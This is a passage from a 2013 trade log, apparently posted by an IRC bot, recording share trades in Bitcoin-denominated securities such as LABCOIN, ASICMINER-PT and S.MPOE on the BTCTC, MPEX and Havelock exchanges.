0.0104 BTC [-] Aug 20 06:43:48 [BTCTC] [LABCOIN] 77 @ 0.002098 = 0.1615 BTC [+] Aug 20 06:44:01 [BTCTC] [LABCOIN] 120 @ 0.002082 = 0.2498 BTC [-] Aug 20 06:44:15 [BTCTC] [LABCOIN] 30 @ 0.002081 = 0.0624 BTC [-] Aug 20 06:45:29 [BTCTC] [ACTIVEMINING] 2 @ 0.005235 = 0.0105 BTC [+] Aug 20 06:46:20 [BTCTC] [NASTY-PT] 3 @ 0.0036 = 0.0108 BTC [-] Aug 20 06:46:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005233 = 0.157 BTC [-] Aug 20 06:46:24 [BTCTC] [ACTIVEMINING] 3 @ 0.005234 = 0.0157 BTC [+] Aug 20 06:46:26 [BTCTC] [ACTIVEMINING] 27 @ 0.005299 = 0.1431 BTC [+] **** BEGIN LOGGING AT Tue Aug 20 13:24:18 2013 Aug 20 13:24:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005437 = 0.2719 BTC [+] Aug 20 13:24:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0355 BTC [-] Aug 20 13:28:27 [BTCTC] [LABCOIN] 30 @ 0.002405 = 0.0722 BTC [-] Aug 20 13:28:29 [BTCTC] [LABCOIN] 20 @ 0.002404 = 0.0481 BTC [-] Aug 20 13:28:30 [BTCTC] [LABCOIN] 3 @ 0.002404 = 0.0072 BTC [-] Aug 20 13:28:31 [BTCTC] [LABCOIN] 77 @ 0.002401 = 0.1849 BTC [-] Aug 20 13:28:32 [BTCTC] [LABCOIN] 70 @ 0.0024 = 0.168 BTC [-] Aug 20 13:33:21 [BTCTC] [BTC-BOND] 9 @ 0.009996 = 0.09 BTC [+] Aug 20 13:35:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0358 BTC [+] Aug 20 13:39:39 [BTCTC] [LABCOIN] 1 @ 0.002432 BTC [+] Aug 20 13:40:09 [BTCTC] [LABCOIN] 1 @ 0.002433 BTC [+] Aug 20 13:41:34 [BTCTC] [DMS.MINING] 3 @ 0.003299 = 0.0099 BTC [+] Aug 20 13:42:15 [MPEX] [S.MPOE] 700 @ 0.00081958 = 0.5737 BTC [+] Aug 20 13:42:27 [MPEX] [S.MPOE] 2343 @ 0.00082158 = 1.925 BTC [+] Aug 20 13:45:14 [BTCTC] [LABCOIN] 2 @ 0.002405 = 0.0048 BTC [-] Aug 20 13:45:38 [BTCTC] [LABCOIN] 20 @ 0.002404 = 0.0481 BTC [-] Aug 20 13:45:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.0355 = 0.1775 BTC [-] Aug 20 13:46:16 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [+] Aug 20 13:46:52 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [+] Aug 20 13:56:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0358 = 0.179 BTC [+] Aug 20 13:58:25 [BTCTC] [LABCOIN] 20 @ 0.002403 = 0.0481 BTC [-] Aug 20 13:58:36 [BTCTC] [ASICMINER-PT] 1 @ 3.68 BTC [+] Aug 20 14:12:43 [HAVELOCK] [XBOND] 22 @ 0.001198 = 0.0264 BTC [+] Aug 20 14:12:56 [BTCTC] [LABCOIN] 1 @ 0.00248 BTC [+] Aug 20 14:13:54 [BTCTC] [LABCOIN] 30 @ 0.00248 = 0.0744 BTC [+] Aug 20 14:13:55 [BTCTC] [LABCOIN] 3 @ 0.002481 = 0.0074 BTC [+] Aug 20 14:13:57 [BTCTC] [LABCOIN] 75 @ 0.002485 = 0.1864 BTC [+] Aug 20 14:13:58 [BTCTC] [LABCOIN] 2 @ 0.002486 = 0.005 BTC [+] Aug 20 14:14:09 [BTCTC] [LABCOIN] 20 @ 0.002486 = 0.0497 BTC [+] Aug 20 14:14:17 [BTCTC] [DMS.MINING] 1 @ 0.003299 BTC [+] Aug 20 14:15:17 [BTCTC] [LABCOIN] 1388 @ 0.002487 = 3.452 BTC [+] Aug 20 14:16:09 [BTCTC] [LABCOIN] 3 @ 0.002412 = 0.0072 BTC [-] Aug 20 14:16:21 [BTCTC] [LABCOIN] 30 @ 0.00241 = 0.0723 BTC [-] Aug 20 14:17:17 [BTCTC] [LABCOIN] 6 @ 0.00241 = 0.0145 BTC [-] Aug 20 14:18:11 [BTCTC] [LABCOIN] 3 @ 0.002478 = 0.0074 BTC [+] Aug 20 14:18:12 [BTCTC] [LABCOIN] 30 @ 0.002479 = 0.0744 BTC [+] Aug 20 14:18:13 [BTCTC] [LABCOIN] 399 @ 0.00248 = 0.9895 BTC [+] Aug 20 14:18:15 [BTCTC] [LABCOIN] 518 @ 0.002487 = 1.2883 BTC [+] Aug 20 14:19:14 [BTCTC] [LABCOIN] 6 @ 0.002486 = 0.0149 BTC [-] Aug 20 14:19:14 [BTCTC] [LABCOIN] 7494 @ 0.002487 = 18.6376 BTC [+] Aug 20 14:20:26 [BTCTC] [LABCOIN] 1 @ 0.002411 BTC [-] Aug 20 14:20:48 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [+] Aug 20 14:26:36 [BTCTC] [LABCOIN] 15 @ 0.002486 = 0.0373 BTC [+] Aug 20 14:27:09 [BTCTC] [LABCOIN] 5 @ 0.002486 = 0.0124 BTC [+] Aug 20 14:27:10 [BTCTC] [LABCOIN] 995 @ 0.002487 = 2.4746 BTC [+] Aug 20 14:27:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005284 = 0.1585 BTC [-] Aug 20 14:27:52 [BTCTC] [ACTIVEMINING] 28 @ 0.005283 = 0.1479 BTC [-] Aug 20 14:27:53 [BTCTC] [ACTIVEMINING] 304 @ 0.005275 = 1.6036 BTC [-] Aug 20 14:29:09 [BTCTC] [LABCOIN] 850 @ 0.002487 = 2.114 BTC [+] Aug 20 14:29:54 [BTCTC] [LABCOIN] 2 @ 0.002487 = 0.005 BTC [+] Aug 20 14:31:45 [BTCTC] [LABCOIN] 165 @ 0.002485 = 0.41 BTC [-] Aug 20 14:38:30 [HAVELOCK] [SDSTM] 5 @ 0.00569 = 0.0285 BTC [+] Aug 20 14:38:37 [BTCTC] [RSM] 1 @ 0.0097 BTC [-] Aug 20 14:38:44 [HAVELOCK] [SDSTM] 2 @ 0.00569999 = 0.0114 BTC [+] Aug 20 14:40:21 [HAVELOCK] [SDSTM] 37 @ 0.0057 = 0.2109 BTC [+] Aug 20 14:43:03 [MPEX] [S.MPOE] 6650 @ 0.00082051 = 5.4564 BTC [-] Aug 20 14:45:02 [MPEX] [S.MPOE] 4450 @ 0.00082051 = 3.6513 BTC [-] Aug 20 14:45:03 [MPEX] [S.MPOE] 2077 @ 0.00082158 = 1.7064 BTC [+] Aug 20 14:51:05 [BTCTC] [DMS.MINING] 12 @ 0.003299 = 0.0396 BTC [+] Aug 20 14:51:06 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.001399 = 0.0154 BTC [-] Aug 20 14:51:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0014 BTC [+] Aug 20 14:51:09 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.001479 = 0.0192 BTC [+] Aug 20 14:51:10 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.00148 = 0.0266 BTC [+] Aug 20 14:51:11 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.001485 = 0.297 BTC [+] Aug 20 14:51:12 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.001498 = 0.0674 BTC [+] Aug 20 14:51:12 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.001499 = 0.0375 BTC [+] Aug 20 14:51:13 [BTCTC] [TAT.VIRTUALMINE] 65 @ 0.0015 = 0.0975 BTC [+] Aug 20 14:51:14 [BTCTC] [TAT.VIRTUALMINE] 622 @ 0.0015 = 0.933 BTC [+] Aug 20 14:51:20 [MPEX] [S.MPOE] 1523 @ 0.00082596 = 1.2579 BTC [+] Aug 20 14:53:16 [BTCTC] [DMS.MINING] 600 @ 0.003299 = 1.9794 BTC [+] Aug 20 14:56:43 [BTCTC] [COGNITIVE] 1 @ 0.3838 BTC [+] Aug 20 14:57:13 [MPEX] [S.MPOE] 9100 @ 0.00081868 = 7.45 BTC [-] Aug 20 14:57:14 [MPEX] [S.MPOE] 1800 @ 0.00081724 = 1.471 BTC [-] Aug 20 15:00:01 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 20 15:00:47 [MPEX] [S.MPOE] 2500 @ 0.00082436 = 2.0609 BTC [+] Aug 20 15:01:34 [BTCTC] [HOSTED-MINING] 2 @ 0.2798 = 0.5596 BTC [+] Aug 20 15:03:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0369 = 0.0738 BTC [+] Aug 20 15:04:30 [HAVELOCK] [VTX] 3 @ 0.61 = 1.83 BTC [-] Aug 20 15:06:25 [BTCTC] [LABCOIN] 13 @ 0.002484 = 0.0323 BTC [-] Aug 20 15:06:41 [BTCTC] [LABCOIN] 7 @ 0.002484 = 0.0174 BTC [-] Aug 20 15:08:01 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1989 = 0.3978 BTC [-] Aug 20 15:08:03 [BTCTC] [CRYPTO-TRADE] 23 @ 0.199 = 4.577 BTC [+] Aug 20 15:08:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Aug 20 15:08:06 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1999 = 1.999 BTC [+] Aug 20 15:10:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.03574 = 0.2859 BTC [-] Aug 20 15:10:30 [BTCTC] [TAT.ASICMINER] 32 @ 0.03573 = 1.1434 BTC [-] Aug 20 15:10:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.03573 = 0.2858 BTC [-] Aug 20 15:10:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.0357 = 0.1071 BTC [-] Aug 20 15:10:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.03554 = 0.0711 BTC [-] Aug 20 15:10:34 [BTCTC] [TAT.ASICMINER] 11 @ 0.03551 = 0.3906 BTC [-] Aug 20 15:10:35 [BTCTC] [DMS.MINING] 4 @ 0.003299 = 0.0132 BTC [+] Aug 20 15:10:36 [BTCTC] [TAT.ASICMINER] 52 @ 0.0355 = 1.846 BTC [-] Aug 20 15:13:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.03689 = 0.3689 BTC [+] Aug 20 15:13:14 [BTCTC] [BASIC-MINING] 23 @ 0.29 = 6.67 BTC [+] Aug 20 15:13:15 [BTCTC] [BASIC-MINING] 46 @ 0.2988 = 13.7448 BTC [+] Aug 20 15:13:17 [HAVELOCK] [AM100] 1 @ 0.0354 BTC [-] Aug 20 15:13:20 [HAVELOCK] [AM100] 5 @ 0.0353 = 0.1765 BTC [-] Aug 20 15:13:24 [HAVELOCK] [AM100] 5 @ 0.0353 = 0.1765 BTC [-] Aug 20 15:13:27 [HAVELOCK] [AM100] 10 @ 0.03520002 = 0.352 BTC [-] Aug 20 15:13:31 [HAVELOCK] [AM100] 22 @ 0.03520001 = 0.7744 BTC [-] Aug 20 15:14:38 [HAVELOCK] [AM1] 1 @ 3.651 BTC [-] Aug 20 15:14:42 [HAVELOCK] [AM1] 1 @ 3.6501 BTC [-] Aug 20 15:14:45 [HAVELOCK] [AM1] 1 @ 3.65 BTC [-] Aug 20 15:14:57 [BTCTC] [BASIC-MINING] 1 @ 0.3142 BTC [+] Aug 20 15:15:50 [BTCTC] [TAT.VIRTUALMINE] 76 @ 0.0015 = 0.114 BTC [+] Aug 20 15:16:21 [BTCTC] [DMS.MINING] 66 @ 0.003299 = 0.2177 BTC [+] Aug 20 15:19:41 [BTCTC] [ASICMINER-PT] 1 @ 3.527 BTC [-] Aug 20 15:19:43 [BTCTC] [ASICMINER-PT] 2 @ 3.526 = 7.052 BTC [-] Aug 20 15:20:36 [BTCTC] [LABCOIN] 392 @ 0.002485 = 0.9741 BTC [+] Aug 20 15:20:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.03551 = 0.4261 BTC [-] Aug 20 15:20:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0355 = 0.071 BTC [-] Aug 20 15:20:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0355 BTC [-] Aug 20 15:20:47 [BTCTC] [TAT.ASICMINER] 60 @ 0.0355 = 2.13 BTC [-] Aug 20 15:22:40 [BTCTC] [ASICMINER-PT] 1 @ 3.523 BTC [-] Aug 20 15:22:41 [BTCTC] [LTC-ATF.B2] 2 @ 0.01035 = 0.0207 BTC [+] Aug 20 15:22:43 [BTCTC] [ASICMINER-PT] 2 @ 3.522 = 7.044 BTC [-] Aug 20 15:22:44 [BTCTC] [ASICMINER-PT] 2 @ 3.521 = 7.042 BTC [-] Aug 20 15:22:46 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [-] Aug 20 15:22:47 [BTCTC] [ASICMINER-PT] 5 @ 3.52 = 17.6 BTC [-] Aug 20 15:22:48 [BTCTC] [ASICMINER-PT] 1 @ 3.519 BTC [-] Aug 20 15:22:49 [BTCTC] [ASICMINER-PT] 1 @ 3.516 BTC [-] Aug 20 15:22:50 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 20 15:23:17 [BTCTC] [BTC-GROWTH] 2 @ 0.099 = 0.198 BTC [-] Aug 20 15:24:19 [BTCTC] [DMS.MINING] 4 @ 0.00322 = 0.0129 BTC [-] Aug 20 15:24:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.03549 BTC [-] Aug 20 15:24:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.0353 = 0.1412 BTC [-] Aug 20 15:24:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.03508 = 0.3157 BTC [-] Aug 20 15:26:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.03506 = 0.0701 BTC [-] Aug 20 15:26:34 [BTCTC] [BTC-GROWTH] 4 @ 0.099 = 0.396 BTC [-] Aug 20 15:26:36 [BTCTC] [BTC-GROWTH] 20 @ 0.0997 = 1.994 BTC [+] Aug 20 15:28:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.03506 = 0.0701 BTC [-] Aug 20 15:28:29 [BTCTC] [CRYPTO-TRADE] 59 @ 0.2 = 11.8 BTC [+] Aug 20 15:28:29 [BTCTC] [CRYPTO-TRADE] 81 @ 0.2 = 16.2 BTC [+] Aug 20 15:28:49 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Aug 20 15:31:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.03507 = 0.6313 BTC [+] Aug 20 15:31:46 [MPEX] [S.MPOE] 3050 @ 0.00082436 = 2.5143 BTC [+] Aug 20 15:33:53 [BTCTC] [BTC-GOLD] 5 @ 0.0205 = 0.1025 BTC [+] Aug 20 15:38:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005277 = 0.1583 BTC [+] Aug 20 15:39:18 [BTCTC] [DMS.MINING] 10 @ 0.003299 = 0.033 BTC [+] Aug 20 15:40:32 [BTCTC] [DMS.MINING] 29 @ 0.00322 = 0.0934 BTC [-] Aug 20 15:41:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005277 = 0.1583 BTC [+] Aug 20 15:41:39 [BTCTC] [DMS.MINING] 100 @ 0.00322 = 0.322 BTC [-] Aug 20 15:42:00 [BTCTC] [CRYPTO-TRADE] 125 @ 0.2 = 25 BTC [+] Aug 20 15:42:27 [BTCTC] [TAT.ASICMINER] 19 @ 0.03507 = 0.6663 BTC [+] Aug 20 15:42:35 [BTCTC] [BASIC-MINING] 1 @ 0.3142 BTC [+] Aug 20 15:43:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.03506 = 0.1753 BTC [-] Aug 20 15:43:13 [BTCTC] [TAT.ASICMINER] 107 @ 0.03505 = 3.7504 BTC [-] Aug 20 15:43:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.03549 = 0.071 BTC [+] Aug 20 15:43:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.0355 = 0.8875 BTC [+] Aug 20 15:43:46 [BTCTC] [ACTIVEMINING] 13 @ 0.005384 = 0.07 BTC [+] Aug 20 15:43:49 [BTCTC] [TAT.ASICMINER] 14 @ 0.03687 = 0.5162 BTC [+] Aug 20 15:44:17 [BTCTC] [ASICMINER-PT] 1 @ 3.56 BTC [+] Aug 20 15:44:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.03688 = 0.1844 BTC [+] Aug 20 15:44:47 [BTCTC] [LABCOIN] 400 @ 0.00246 = 0.984 BTC [-] Aug 20 15:44:49 [BTCTC] [LABCOIN] 20 @ 0.002422 = 0.0484 BTC [-] Aug 20 15:44:50 [BTCTC] [LABCOIN] 1 @ 0.002411 BTC [-] Aug 20 15:44:50 [BTCTC] [LABCOIN] 5 @ 0.002402 = 0.012 BTC [-] Aug 20 15:44:52 [BTCTC] [LABCOIN] 201 @ 0.002402 = 0.4828 BTC [-] Aug 20 15:44:53 [BTCTC] [LABCOIN] 60 @ 0.002401 = 0.1441 BTC [-] Aug 20 15:44:54 [BTCTC] [LABCOIN] 550 @ 0.0024 = 1.32 BTC [-] Aug 20 15:44:55 [BTCTC] [LABCOIN] 1000 @ 0.0024 = 2.4 BTC [-] Aug 20 15:44:56 [BTCTC] [LABCOIN] 10 @ 0.00239 = 0.0239 BTC [-] Aug 20 15:44:57 [BTCTC] [LABCOIN] 82 @ 0.002389 = 0.1959 BTC [-] Aug 20 15:44:58 [BTCTC] [LABCOIN] 343 @ 0.002341 = 0.803 BTC [-] Aug 20 15:44:59 [BTCTC] [LABCOIN] 328 @ 0.00234 = 0.7675 BTC [-] Aug 20 15:45:50 [BTCTC] [LABCOIN] 20 @ 0.00248 = 0.0496 BTC [+] Aug 20 15:45:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0015 BTC [+] Aug 20 15:52:07 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.001242 = 0.0149 BTC [-] Aug 20 15:52:17 [BTCTC] [ACTIVEMINING] 3 @ 0.005369 = 0.0161 BTC [-] Aug 20 15:52:40 [BTCTC] [BFMINES] 1 @ 0.001101 BTC [-] Aug 20 15:53:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.03504 = 0.4205 BTC [-] Aug 20 16:03:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.03504 BTC [-] Aug 20 16:04:24 [BTCTC] [LABCOIN] 2 @ 0.002473 = 0.0049 BTC [-] Aug 20 16:06:07 [BTCTC] [LABCOIN] 2 @ 0.002473 = 0.0049 BTC [-] Aug 20 16:06:26 [BTCTC] [LABCOIN] 75 @ 0.002473 = 0.1855 BTC [-] Aug 20 16:06:38 nothing like some strong coffee in the am Aug 20 16:07:20 [BTCTC] [ASICMINER-PT] 1 @ 3.573 BTC [+] Aug 20 16:07:41 [BTCTC] [LABCOIN] 421 @ 0.002473 = 1.0411 BTC [-] Aug 20 16:08:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.03648 = 0.2918 BTC [+] Aug 20 16:16:00 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [+] Aug 20 16:18:59 [HAVELOCK] [AM1] 1 @ 3.61 BTC [-] Aug 20 16:19:55 [BTCTC] [ASICMINER-PT] 1 @ 3.53 BTC [-] Aug 20 16:20:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.03517 = 0.2814 BTC [-] Aug 20 16:20:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03516 BTC [-] Aug 20 16:20:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.03505 = 0.1402 BTC [-] Aug 20 16:20:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.03504 = 0.1402 BTC [-] Aug 20 16:20:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.03504 = 0.7008 BTC [-] Aug 20 16:20:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.03501 = 0.5602 BTC [-] Aug 20 16:27:12 [BTCTC] [LABCOIN] 85 @ 0.002421 = 0.2058 BTC [-] Aug 20 16:27:14 [BTCTC] [LABCOIN] 20 @ 0.00242 = 0.0484 BTC [-] Aug 20 16:27:15 [BTCTC] [LABCOIN] 5 @ 0.00236 = 0.0118 BTC [-] Aug 20 16:27:16 [BTCTC] [LABCOIN] 62 @ 0.002345 = 0.1454 BTC [-] Aug 20 16:27:18 [BTCTC] [LABCOIN] 98 @ 0.002344 = 0.2297 BTC [-] Aug 20 16:28:01 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [-] Aug 20 16:28:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.03619 = 0.7238 BTC [+] Aug 20 16:29:36 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 20 16:29:55 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 20 16:30:52 [BTCTC] [ASICMINER-PT] 2 @ 3.51 = 7.02 BTC [-] Aug 20 16:30:54 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 20 16:33:24 [BTCTC] [ASICMINER-PT] 4 @ 3.52 = 14.08 BTC [+] Aug 20 16:33:58 [BTCTC] [ASICMINER-PT] 5 @ 3.51 = 17.55 BTC [-] Aug 20 16:34:00 [BTCTC] [ASICMINER-PT] 4 @ 3.509 = 14.036 BTC [-] Aug 20 16:34:01 [HAVELOCK] [AM100] 10 @ 0.03570002 = 0.357 BTC [+] Aug 20 16:34:12 [BTCTC] [ASICMINER-PT] 3 @ 3.75 = 11.25 BTC [+] Aug 20 16:34:16 [HAVELOCK] [SDSTM] 5 @ 0.0032 = 0.016 BTC [-] Aug 20 16:34:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.03612 = 0.0722 BTC [-] Aug 20 16:34:34 [BTCTC] [DMS.MINING] 1 @ 0.00322 BTC [-] Aug 20 16:35:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.03513 = 0.7026 BTC [-] Aug 20 16:36:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03501 BTC [-] Aug 20 16:37:41 [HAVELOCK] [SDSTM] 14 @ 0.0032 = 0.0448 BTC [-] Aug 20 16:38:03 [HAVELOCK] [XBOND] 43 @ 0.001198 = 0.0515 BTC [+] Aug 20 16:43:46 [BTCTC] [LABCOIN] 30 @ 0.002386 = 0.0716 BTC [+] Aug 20 16:43:47 [BTCTC] [LABCOIN] 55 @ 0.002385 = 0.1312 BTC [-] Aug 20 16:43:54 [BTCTC] [LTC-ATF.B2] 1 @ 0.0103 BTC [-] Aug 20 16:43:55 [BTCTC] [LTC-ATF.B2] 1 @ 0.0102 BTC [-] Aug 20 16:43:57 [BTCTC] [LTC-ATF.B2] 15 @ 0.01019 = 0.1529 BTC [-] Aug 20 16:43:58 [BTCTC] [LTC-ATF.B2] 2 @ 0.01018 = 0.0204 BTC [-] Aug 20 16:43:59 [BTCTC] [LTC-ATF.B2] 36 @ 0.01017 = 0.3661 BTC [-] Aug 20 16:44:01 [BTCTC] [LTC-ATF.B2] 100 @ 0.01016 = 1.016 BTC [-] Aug 20 16:44:01 [BTCTC] [LTC-ATF.B2] 20 @ 0.01015 = 0.203 BTC [-] Aug 20 16:50:03 [HAVELOCK] [SDSTM] 1 @ 0.00569 BTC [+] Aug 20 16:56:06 [BTCTC] [DMS.MINING] 30 @ 0.003319 = 0.0996 BTC [+] Aug 20 16:57:09 [HAVELOCK] [AM100] 2 @ 0.0368 = 0.0736 BTC [+] Aug 20 17:04:57 [BTCTC] [DMS.MINING] 156 @ 0.003319 = 0.5178 BTC [+] Aug 20 17:05:29 [BTCTC] [LABCOIN] 30 @ 0.002351 = 0.0705 BTC [-] Aug 20 17:05:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005279 = 0.1584 BTC [-] Aug 20 17:05:46 [BTCTC] [ACTIVEMINING] 68 @ 0.005278 = 0.3589 BTC [-] Aug 20 17:05:47 [BTCTC] [DMS.MINING] 172 @ 0.00332 = 0.571 BTC [+] Aug 20 17:05:48 [BTCTC] [ACTIVEMINING] 2 @ 0.005276 = 0.0106 BTC [-] Aug 20 17:05:49 [BTCTC] [ACTIVEMINING] 196 @ 0.005275 = 1.0339 BTC [-] Aug 20 17:05:51 [BTCTC] [ACTIVEMINING] 4 @ 0.005222 = 0.0209 BTC [-] Aug 20 17:06:23 [BTCTC] [LABCOIN] 6 @ 0.00235 = 0.0141 BTC [-] Aug 20 17:07:38 [MPEX] [S.MPOE] 4050 @ 0.00082145 = 3.3269 BTC [-] Aug 20 17:08:18 [BTCTC] [LABCOIN] 261 @ 0.002344 = 0.6118 BTC [-] Aug 20 17:12:57 [HAVELOCK] [SDSTM] 1 @ 0.00569 BTC [+] Aug 20 17:15:54 [MPEX] [S.MPOE] 7200 @ 0.00081922 = 5.8984 BTC [-] Aug 20 17:18:38 [BTCTC] [LABCOIN] 141 @ 0.002344 = 0.3305 BTC [-] Aug 20 17:21:37 [BTCTC] [LABCOIN] 1 @ 0.002335 BTC [-] Aug 20 17:24:03 [BTCTC] [ASICMINER-PT] 1 @ 3.596 BTC [-] Aug 20 17:24:31 [BTCTC] [ASICMINER-PT] 1 @ 3.597 BTC [+] Aug 20 17:24:51 [BTCTC] [ASICMINER-PT] 5 @ 3.597 = 17.985 BTC [+] Aug 20 17:26:27 [BTCTC] [LABCOIN] 58 @ 0.002335 = 0.1354 BTC [-] Aug 20 17:28:22 [HAVELOCK] [XBOND] 1 @ 0.001198 BTC [+] Aug 20 17:30:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005223 = 0.1567 BTC [+] Aug 20 17:30:26 [BTCTC] [ACTIVEMINING] 46 @ 0.005222 = 0.2402 BTC [-] Aug 20 17:30:28 [BTCTC] [ACTIVEMINING] 30 @ 0.005221 = 0.1566 BTC [-] Aug 20 17:30:29 [BTCTC] [ACTIVEMINING] 1500 @ 0.00522 = 7.83 BTC [-] Aug 20 17:30:29 [BTCTC] [ACTIVEMINING] 10 @ 0.00522 = 0.0522 BTC [-] Aug 20 17:30:30 [BTCTC] [ACTIVEMINING] 200 @ 0.00521 = 1.042 BTC [-] Aug 20 17:31:27 [MPEX] [S.MPOE] 4775 @ 0.00082145 = 3.9224 BTC [+] Aug 20 17:31:28 [MPEX] [S.MPOE] 567 @ 0.00082259 = 0.4664 BTC [+] Aug 20 17:32:00 [BTCTC] [LABCOIN] 22 @ 0.002349 = 0.0517 BTC [+] Aug 20 17:32:01 [BTCTC] [LABCOIN] 178 @ 0.00235 = 0.4183 BTC [+] Aug 20 17:33:51 [HAVELOCK] [AM100] 1 @ 0.0361 BTC [-] Aug 20 17:33:55 [HAVELOCK] [AM100] 13 @ 0.036 = 0.468 BTC [-] Aug 20 17:33:58 [HAVELOCK] [AM100] 4 @ 0.0358 = 0.1432 BTC [-] Aug 20 17:34:02 [HAVELOCK] [AM100] 30 @ 0.03570002 = 1.071 BTC [-] Aug 20 17:34:05 [HAVELOCK] [AM100] 1 @ 0.03570001 BTC [-] Aug 20 17:34:08 [HAVELOCK] [AM100] 7 @ 0.035211 = 0.2465 BTC [-] Aug 20 17:34:12 [HAVELOCK] [AM100] 5 @ 0.03521 = 0.1761 BTC [-] Aug 20 17:34:15 [HAVELOCK] [AM100] 1 @ 0.03520002 BTC [-] Aug 20 17:34:19 [HAVELOCK] [AM100] 238 @ 0.03520001 = 8.3776 BTC [-] Aug 20 17:34:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.03501 = 0.3851 BTC [-] Aug 20 17:34:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.035 = 0.175 BTC [-] Aug 20 17:34:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [-] Aug 20 17:34:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 20 17:34:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 20 17:34:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.035 = 1.75 BTC [-] Aug 20 17:34:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 20 17:34:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 20 17:34:57 [BTCTC] [TAT.ASICMINER] 40 @ 0.035 = 1.4 BTC [-] Aug 20 17:34:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 20 17:34:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.035 = 1.75 BTC [-] Aug 20 17:35:01 [BTCTC] [TAT.ASICMINER] 27 @ 0.035 = 0.945 BTC [-] Aug 20 17:36:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.03501 = 0.07 BTC [+] Aug 20 17:36:19 [BTCTC] [TAT.ASICMINER] 223 @ 0.035 = 7.805 BTC [-] Aug 20 17:36:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 20 17:36:42 [HAVELOCK] [AM100] 65 @ 0.03520001 = 2.288 BTC [-] Aug 20 17:36:45 [HAVELOCK] [AM100] 10 @ 0.03500001 = 0.35 BTC [-] Aug 20 17:36:48 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 20 17:36:51 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 20 17:38:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0355 = 0.071 BTC [+] Aug 20 17:38:43 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002422 = 0.0024 BTC [+] Aug 20 17:40:03 [BTCTC] [ASICMINER-PT] 2 @ 3.597 = 7.194 BTC [+] Aug 20 17:43:36 [BTCTC] [TAT.ASICMINER] 1 @ 